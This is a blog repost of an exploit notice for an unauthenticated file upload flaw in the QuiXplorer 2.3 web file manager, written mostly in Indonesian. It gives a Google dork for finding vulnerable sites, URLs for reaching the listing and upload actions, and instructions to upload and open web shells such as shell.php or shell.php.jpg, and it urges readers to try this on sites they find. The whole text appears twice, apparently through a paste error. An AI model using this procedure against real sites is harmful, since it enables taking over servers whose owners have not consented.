# Exploit Title: QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability
# Google Dork: "QuiXplorer 2.3 - the QuiX project"
# Date: 13/11/2011
# Author: PCA & krhr_krhr and
# Software Link: http://quixplorer.sourceforge.net/
# Version: QuiXplorer 2.3
# Tested on: linux ,windows
# CVE :
---------------------------------------------------------------------------------------------------------- Paste di google
Google Dork: "QuiXplorer 2.3 - the QuiX project" <== hilangkan tanda kutip
Vulnerablity
Kemudian akan menemukan contoh seperti di bawah ini :
Exploit :
http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
-----------------------------------------------------------------------------------------------------------
setelah anda Pergi ke site yg anda cari tadi, maka Anda akan melihat file manager
Anda dapat meng-upload file Anda di sana
maka menemukan ikon di halaman dan terakhir klik , pilihan meng-upload
Anda dapat langsung meng-upload juga dengan mengubah url, hanya menempatkan >> action=upload&order=name&srt=yes
after index.php? <==
contoh :: http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
Support Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file
click On you file For view
Bingung yah ?
praktekan ja dulu... nanti lama-lama akan ngerti sendiri
# Google Dork: "QuiXplorer 2.3 - the QuiX project"
# Date: 13/11/2011
# Author: PCA & krhr_krhr and
# Software Link: http://quixplorer.sourceforge.net/
# Version: QuiXplorer 2.3
# Tested on: linux ,windows
# CVE :
---------------------------------------------------------------------------------------------------------- Paste di google
Google Dork: "QuiXplorer 2.3 - the QuiX project" <== hilangkan tanda kutip
Vulnerablity
Kemudian akan menemukan contoh seperti di bawah ini :
Exploit :
http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
-----------------------------------------------------------------------------------------------------------
setelah anda Pergi ke site yg anda cari tadi, maka Anda akan melihat file manager
Anda dapat meng-upload file Anda di sana
maka menemukan ikon di halaman dan terakhir klik , pilihan meng-upload
Anda dapat langsung meng-upload juga dengan mengubah url, hanya menempatkan >> action=upload&order=name&srt=yes
after index.php? <==
contoh :: http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
Support Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file
click On you file For view
Bingung yah ?
praktekan ja dulu... nanti lama-lama akan ngerti sendiri
0 komentar:
Posting Komentar